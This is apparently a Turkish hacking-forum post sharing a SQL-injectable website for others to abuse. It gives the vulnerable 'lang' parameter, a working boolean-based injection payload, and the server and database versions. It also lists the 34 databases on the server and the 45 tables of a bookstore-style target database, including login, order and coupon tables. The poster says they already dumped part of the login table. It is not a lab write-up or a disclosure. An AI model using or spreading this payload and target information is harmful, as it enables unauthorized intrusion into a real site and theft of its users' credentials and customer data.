İçeriği görüntülemek için Giriş yapın veya Kayıt olun.
Arkadaşlar sizlere binlerce data içeren bir web sitesi veriyorum. new_login tablosunun yarısını falan telefondan çektim ancak biraz sorun yaşadım çok büyük içeriği var ve ben telefondan leak etmek istemedim bunu, PC ye geçtiğinde bu tablodan data çekilemediğini farkettim sadece tek bir telefondan çekebiliyorum şuanda. Neyse çok boş yaptım güle güle kullanın
TESİP EDİLEN ZAFİYET:
· Parametre: lang
· Tür: Boolean-based blind ve UNION query SQL Injection
· Payload: lang=en' AND 4306=4306 AND 'zrgo'='zrgo
· Back-end DBMS: MySQL 8.0.0
· Web Sunucusu: Apache 2.4.58, PHP
· İşletim Sistemi: Linux Ubuntu
---
VERİTABANLARI (34 tane):
adva, adva_test, bookly, democlub, dfxeng, drorit, hbshort, heliconbooks, heliconbooks_new, helicontech, information_schema, kuttner, landingpages, mysql, opus, opus_restore, oriblog, oriidan, papertiger, pardes, pardes_restore, performance_schema, phpmyadmin, quickepub, quickepub_editor, schalgi, schalgi_assistant, schalgi_bak, schalgi_new, schalgi_restore, status, sys, trips, wptest
---
HEDEF VERİTABANI: pardes
TABLOLAR (45 tane):
new_articles, new_books, new_books1, new_categories, new_contribdata, new_contributors, new_coupons, new_deliveries, new_deliveryspots, new_digfiles, new_login, new_manuscripts, new_newsletter, new_orderhist, new_orderitems, new_orderitems_b, new_prices, new_prices_backup, new_reviews, new_salemanager, new_sitesales, new_terms, new_terms1, new_tmp_books, new_userpriv, store_articles, store_books, store_books_b, store_books_b1, store_categories, store_categoriesback, store_contribdata, store_contributors, store_coupons, store_files, store_intpics, store_login, store_orderitems, store_orderitems_b, store_reviews, store_salemanager, store_terms, store_terms_b, store_termsback, store_userpriv
Moderatör tarafında düzenlendi:




